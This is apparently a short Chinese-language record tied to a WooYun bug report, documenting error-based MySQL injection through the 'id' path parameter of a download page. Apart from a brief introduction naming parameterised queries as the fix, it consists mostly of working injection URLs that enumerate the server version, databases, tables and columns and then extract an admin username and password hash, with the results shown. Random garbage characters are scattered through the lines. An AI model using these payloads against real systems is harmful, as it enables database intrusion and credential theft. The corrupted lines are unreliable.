http://www.wooyun.org/bugs/wooyun-2010-01666
之前想找个测试，没想到这有，可以测试下，做个记录而已。从下面的结果看，id 这一段路径参数应该是未经参数化直接拼进了 SQL 语句，并且数据库报错信息被回显到页面，下面各项的值都是从报错内容里读出来的；修复方向是改用参数化查询并关闭对外的错误回显。
% O4 @# q2 Z) Y$ Hhttp://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003% v# Q. `7 ?3 x7 n% i$ s
+ J0 G, V! h r5 r/data0/htdocs/leqi_new/app/myapp.php0 y4 \( _% m" d& S3 o; E
或者
/**********version()**********/ 5.1.49-log
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
/**********user()**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
/**********database()**********/ leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
/**********limit依次递归爆库**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003# @/ e. Q; Y+ J7 z; A
information_schema
7 n9 A6 H' h8 Y8 g% @% H; w& yhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0031 s% Y' ^! d0 U. U- r" g4 b
leqi
, w! B) _+ y0 j0 nhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
# w8 A. B0 ^" N$ D: t: ntest; P6 K5 J4 [/ f( r" \
/**********limit依次递归爆表名**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
5 A! H6 \( j0 c ]9 l* g( husers
/**********limit依次递归爆字段名**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
- }: H1 k' u; f$ V- D: U+ vuser_id,username,nickname,passwd,group_id _% E% }2 b0 o ^* k
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23" E: s4 r" ? L. l( D% K; I
/wapc/5000_0005_003
: O! a8 e% w# @11 21
9 S( D3 W$ j1 \- y( P T+ `- yhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
1 |$ P0 K$ [* E3 z$ w, M5 m8 z% j/wapc/5000_0005_003
, h1 M) `* ^6 |% o- y11 341 351 361
/**********爆数据**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
) h: Q4 O! p. }& \ ?; Badmin2 x/ [$ w3 c0 ]# C1 T+ o' [ Y
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
' k! F+ o, }: ]8 ?0 ]6a8b4574ca231eb8bd52764d4978ffcd0 E. V' L9 u2 `* o